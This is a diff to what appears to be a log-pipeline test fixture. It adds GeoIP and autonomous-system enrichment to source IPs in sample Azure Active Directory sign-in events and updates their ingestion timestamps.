@@ -962,6 +1058,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -1042,7 +1150,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970120100Z", + "ingested": "2021-12-14T14:49:08.047401083Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1082,6 +1190,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1162,7 +1282,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970123900Z", + "ingested": "2021-12-14T14:49:08.047401720Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1202,6 +1322,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -1282,7 +1414,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970128600Z", + "ingested": "2021-12-14T14:49:08.047402301Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1322,6 +1454,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -1402,7 +1546,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970133400Z", + "ingested": "2021-12-14T14:49:08.047402932Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1442,6 +1586,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -1522,7 +1678,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970138300Z", + "ingested": "2021-12-14T14:49:08.047403447Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1562,6 +1718,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -1642,7 +1810,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970142Z", + "ingested": "2021-12-14T14:49:08.047404110Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1682,6 +1850,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ 
@@ -1762,7 +1942,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970146600Z", + "ingested": "2021-12-14T14:49:08.047404738Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1802,6 +1982,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -1882,7 +2074,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970152300Z", + "ingested": "2021-12-14T14:49:08.047405391Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -1922,6 +2114,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -2002,7 +2206,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970156200Z", + "ingested": "2021-12-14T14:49:08.047406205Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -2042,6 +2246,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ 
@@ -2122,7 +2338,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970160100Z", + "ingested": "2021-12-14T14:49:08.047406912Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -2162,6 +2378,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2242,7 +2470,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970163400Z", + "ingested": "2021-12-14T14:49:08.047407517Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -2282,6 +2510,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2362,7 +2602,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970167700Z", + "ingested": "2021-12-14T14:49:08.047408141Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
